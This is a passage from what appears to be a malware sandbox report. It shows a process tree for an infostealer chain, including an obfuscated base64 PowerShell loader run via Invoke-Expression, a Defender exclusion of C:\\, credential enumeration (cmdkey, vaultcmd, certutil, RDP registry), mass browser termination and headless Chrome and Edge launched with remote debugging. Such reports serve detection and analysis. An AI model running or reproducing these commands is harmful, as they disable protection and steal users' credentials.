eGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                    6⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Drops startup file
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: AddClipboardFormatListener
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2952
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                      7⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1800
              • C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe
                "C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"
                4⤵
                • Executes dropped EXE
                • Enumerates connected drives
                • Suspicious behavior: EnumeratesProcesses
                PID:4084
                • C:\Windows\system32\cmd.exe
                  "cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_1929388636.txt\""
                  5⤵
                  • NTFS ADS
                  PID:5476
                • C:\Windows\system32\net.exe
                  "net" statistics workstation
                  5⤵
                    PID:4820
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 statistics workstation
                      6⤵
                        PID:4668
                    • C:\Windows\system32\vaultcmd.exe
                      "vaultcmd" /list
                      5⤵
                        PID:4388
                      • C:\Windows\system32\tasklist.exe
                        "tasklist"
                        5⤵
                        • Enumerates processes with tasklist
                        • Suspicious use of AdjustPrivilegeToken
                        PID:6116
                      • C:\Windows\system32\tasklist.exe
                        "tasklist" /FO CSV /NH
                        5⤵
                        • Enumerates processes with tasklist
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5372
                      • C:\Windows\system32\tasklist.exe
                        "tasklist"
                        5⤵
                        • Enumerates processes with tasklist
                        • Suspicious use of AdjustPrivilegeToken
                        PID:976
                      • C:\Windows\system32\cmdkey.exe
                        "cmdkey" /list
                        5⤵
                          PID:2724
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
                          5⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1980
                          • C:\Windows\system32\cmdkey.exe
                            "C:\Windows\system32\cmdkey.exe" /list
                            6⤵
                              PID:2732
                          • C:\Windows\system32\certutil.exe
                            "certutil" -store My
                            5⤵
                              PID:396
                            • C:\Windows\system32\tasklist.exe
                              "tasklist"
                              5⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2352
                            • C:\Windows\system32\certutil.exe
                              "certutil" -store -user My
                              5⤵
                                PID:4652
                              • C:\Windows\system32\tasklist.exe
                                "tasklist"
                                5⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4420
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
                                5⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                PID:1876
                              • C:\Windows\system32\tasklist.exe
                                "tasklist"
                                5⤵
                                • Enumerates processes with tasklist
                                PID:4000
                              • C:\Windows\system32\tasklist.exe
                                "tasklist"
                                5⤵
                                • Enumerates processes with tasklist
                                PID:2128
                              • C:\Windows\system32\tasklist.exe
                                "tasklist"
                                5⤵
                                • Enumerates processes with tasklist
                                PID:4296
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
                                5⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Hide Artifacts: Ignore Process Interrupts
                                • Suspicious behavior: EnumeratesProcesses
                                PID:224
                              • C:\Windows\system32\tasklist.exe
                                "tasklist"
                                5⤵
                                • Enumerates processes with tasklist
                                PID:4920
                              • C:\Windows\system32\cmdkey.exe
                                "cmdkey" /list
                                5⤵
                                  PID:1848
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  5⤵
                                  • Enumerates processes with tasklist
                                  PID:5540
                                • C:\Windows\system32\cmdkey.exe
                                  "cmdkey" /list:TERMSRV/69.48.201.74
                                  5⤵
                                    PID:2448
                                  • C:\Windows\system32\tasklist.exe
                                    "tasklist"
                                    5⤵
                                    • Enumerates processes with tasklist
                                    PID:3432
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      6⤵
                                        PID:748
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM chrome.exe
                                      5⤵
                                      • Kills process with taskkill
                                      PID:2388
                                    • C:\Windows\system32\tasklist.exe
                                      "tasklist"
                                      5⤵
                                      • Enumerates processes with tasklist
                                      PID:3416
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM msedge.exe
                                      5⤵
                                        PID:2892
                                      • C:\Windows\system32\tasklist.exe
                                        "tasklist"
                                        5⤵
                                        • Enumerates processes with tasklist
                                        PID:2956
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM brave.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:5548
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM opera.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:5408
                                      • C:\Windows\system32\tasklist.exe
                                        "tasklist"
                                        5⤵
                                        • Enumerates processes with tasklist
                                        PID:2004
                                        • C:\Windows\System32\Conhost.exe
                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          6⤵
                                            PID:1692
                                        • C:\Windows\system32\taskkill.exe
                                          "taskkill" /IM vivaldi.exe
                                          5⤵
                                          • Kills process with taskkill
                                          PID:4520
                                        • C:\Windows\system32\tasklist.exe
                                          "tasklist"
                                          5⤵
                                          • Enumerates processes with tasklist
                                          PID:3320
                                        • C:\Windows\system32\taskkill.exe
                                          "taskkill" /IM firefox.exe
                                          5⤵
                                          • Kills process with taskkill
                                          PID:4604
                                        • C:\Windows\system32\tasklist.exe
                                          "tasklist"
                                          5⤵
                                          • Enumerates processes with tasklist
                                          PID:5388
                                        • C:\Windows\system32\taskkill.exe
                                          "taskkill" /IM dragon.exe
                                          5⤵
                                          • Kills process with taskkill
                                          PID:2492
                                        • C:\Windows\system32\taskkill.exe
                                          "taskkill" /F /IM chrome.exe
                                          5⤵
                                          • Kills process with taskkill
                                          PID:5552
                                        • C:\Windows\system32\taskkill.exe
                                          "taskkill" /IM maxthon.exe
                                          5⤵
                                          • Kills process with taskkill
                                          PID:3508
                                        • C:\Windows\system32\taskkill.exe
                                          "taskkill" /F /IM Discord.exe
                                          5⤵
                                          • Kills process with taskkill
                                          PID:3960
                                        • C:\Windows\system32\taskkill.exe
                                          "taskkill" /IM uc_browser.exe
                                          5⤵
                                            PID:4468
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /F /IM DiscordCanary.exe
                                            5⤵
                                            • Kills process with taskkill
                                            PID:4112
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /IM slimjet.exe
                                            5⤵
                                            • Kills process with taskkill
                                            PID:1388
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /F /IM DiscordPTB.exe
                                            5⤵
                                              PID:3116
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /IM cent_browser.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:2880
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /F /IM DiscordDevelopment.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:1984
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /IM epic.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:3520
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /IM torch.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:6108
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /IM whale.exe
                                              5⤵
                                                PID:1692
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM 360browser.exe
                                                5⤵
                                                • Kills process with taskkill
                                                PID:4152
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM qqbrowser.exe
                                                5⤵
                                                • Kills process with taskkill
                                                PID:5028
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM browser.exe
                                                5⤵
                                                • Kills process with taskkill
                                                PID:460
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM chrome.exe
                                                5⤵
                                                • Kills process with taskkill
                                                PID:1080
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM msedge.exe
                                                5⤵
                                                • Kills process with taskkill
                                                PID:1492
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM brave.exe
                                                5⤵
                                                • Kills process with taskkill
                                                PID:4296
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM opera.exe
                                                5⤵
                                                • Kills process with taskkill
                                                PID:3476
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  6⤵
                                                    PID:2492
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM vivaldi.exe
                                                  5⤵
                                                  • Kills process with taskkill
                                                  PID:5664
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM firefox.exe
                                                  5⤵
                                                  • Kills process with taskkill
                                                  PID:3064
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM dragon.exe
                                                  5⤵
                                                  • Kills process with taskkill
                                                  PID:4952
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM maxthon.exe
                                                  5⤵
                                                  • Kills process with taskkill
                                                  PID:2272
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM uc_browser.exe
                                                  5⤵
                                                  • Kills process with taskkill
                                                  PID:1788
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM slimjet.exe
                                                  5⤵
                                                  • Kills process with taskkill
                                                  PID:1596
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM cent_browser.exe
                                                  5⤵
                                                  • Kills process with taskkill
                                                  PID:2944
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM epic.exe
                                                  5⤵
                                                  • Kills process with taskkill
                                                  PID:2056
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM torch.exe
                                                  5⤵
                                                  • Kills process with taskkill
                                                  PID:5932
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM whale.exe
                                                  5⤵
                                                  • Kills process with taskkill
                                                  PID:1388
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM 360browser.exe
                                                  5⤵
                                                  • Kills process with taskkill
                                                  PID:1984
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM qqbrowser.exe
                                                  5⤵
                                                  • Kills process with taskkill
                                                  PID:1508
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM browser.exe
                                                  5⤵
                                                  • Kills process with taskkill
                                                  PID:4172
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist" /FI "IMAGENAME eq chrome.exe"
                                                  5⤵
                                                  • Enumerates processes with tasklist
                                                  PID:5916
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=44489 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default
                                                  5⤵
                                                  • Uses browser remote debugging
                                                  • Checks processor information in registry
                                                  • Enumerates system info in registry
                                                  • Modifies data under HKEY_USERS
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:5496
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbb3d2dcf8,0x7ffbb3d2dd04,0x7ffbb3d2dd10
                                                    6⤵
                                                      PID:5696
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=2544,i,6354571419092654638,7230501436406917915,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2536 /prefetch:2
                                                      6⤵
                                                      • Modifies registry class
                                                      PID:5648
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2932,i,6354571419092654638,7230501436406917915,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2920 /prefetch:3
                                                      6⤵
                                                        PID:5112
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=3484,i,6354571419092654638,7230501436406917915,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3480 /prefetch:8
                                                        6⤵
                                                          PID:5288
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=44489 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3864,i,6354571419092654638,7230501436406917915,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3856 /prefetch:1
                                                          6⤵
                                                          • Uses browser remote debugging
                                                          PID:1692
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=44489 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3916,i,6354571419092654638,7230501436406917915,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3908 /prefetch:1
                                                          6⤵
                                                          • Uses browser remote debugging
                                                          PID:5372
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=44489 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4040,i,6354571419092654638,7230501436406917915,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4036 /prefetch:1
                                                          6⤵
                                                          • Uses browser remote debugging
                                                          PID:4060
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4532,i,6354571419092654638,7230501436406917915,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4528 /prefetch:8
                                                          6⤵
                                                            PID:4600
                                                        • C:\Windows\system32\tasklist.exe
                                                          "tasklist" /FI "IMAGENAME eq chrome.exe"
                                                          5⤵
                                                          • Enumerates processes with tasklist
                                                          PID:3084
                                                        • C:\Windows\system32\taskkill.exe
                                                          "taskkill" /F /IM chrome.exe
                                                          5⤵
                                                          • Kills process with taskkill
                                                          PID:4904
                                                        • C:\Windows\system32\tasklist.exe
                                                          "tasklist" /FI "IMAGENAME eq msedge.exe"
                                                          5⤵
                                                          • Enumerates processes with tasklist
                                                          PID:2944
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=44156 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default
                                                          5⤵
                                                          • Uses browser remote debugging
                                                          • Checks processor information in registry
                                                          • Enumerates system info in registry
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:6796
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x22c,0x230,0x234,0x228,0x354,0x7ffbb167f208,0x7ffbb167f214,0x7ffbb167f220
                                                            6⤵
                                                              PID:6864
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=2484,i,7152480520436530220,16136758314563099545,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:2
                                                              6⤵
                                                              • Modifies registry class
                                                              PID:5524
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2892,i,7152480520436530220,16136758314563099545,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2884 /prefetch:3
                                                              6⤵
                                                                PID:7460
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2600,i,7152480520436530220,16136758314563099545,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:8
                                                                6⤵
                                                                  PID:7732
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=44156 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=4128,i,7152480520436530220,16136758314563099545,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4124 /prefetch:1
                                                                  6⤵
                                                                  • Uses browser remote debugging
                                                                  PID:7900
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --no-sandbox --remote-debugging-port=44156 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3656,i,7152480520436530220,16136758314563099545,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3188 /prefetch:1
                                                                  6⤵
                                                                  • Uses browser remote debugging
                                                                  PID:7356
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=44156 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4508,i,7152480520436530220,16136758314563099545,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4500 /prefetch:1
                                                                  6⤵
                                                                  • Uses browser remote debugging
                                                                  PID:7532
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --no-sandbox --remote-debugging-port=44156 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4592,i,7152480520436530220,16136758314563099545,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4696 /prefetch:2
                                                                  6⤵
                                                                  • Uses browser remote debugging
                                                                  PID:6948
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4120,i,7152480520436530220,16136758314563099545,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4124 /prefetch:8
                                                                  6⤵
                                                                    PID:9800
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --mute-audio --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4956,i,7152480520436530220,16136758314563099545,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4948 /prefetch:8
                                                                    6⤵
                                                                      PID:11228
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --message-loop-type-ui --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5160,i,7152480520436530220,16136758314563099545,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5156 /prefetch:8
                                                                      6⤵
                                                                        PID:11616
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --message-loop-type-ui --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5320,i,7152480520436530220,16136758314563099545,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8
                                                                        6⤵
                                                                          PID:1688
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --message-loop-type-ui --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5372,i,7152480520436530220,16136758314563099545,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5364 /prefetch:8
                                                                          6⤵
                                                                            PID:4940
                                                                        • C:\Windows\system32\tasklist.exe
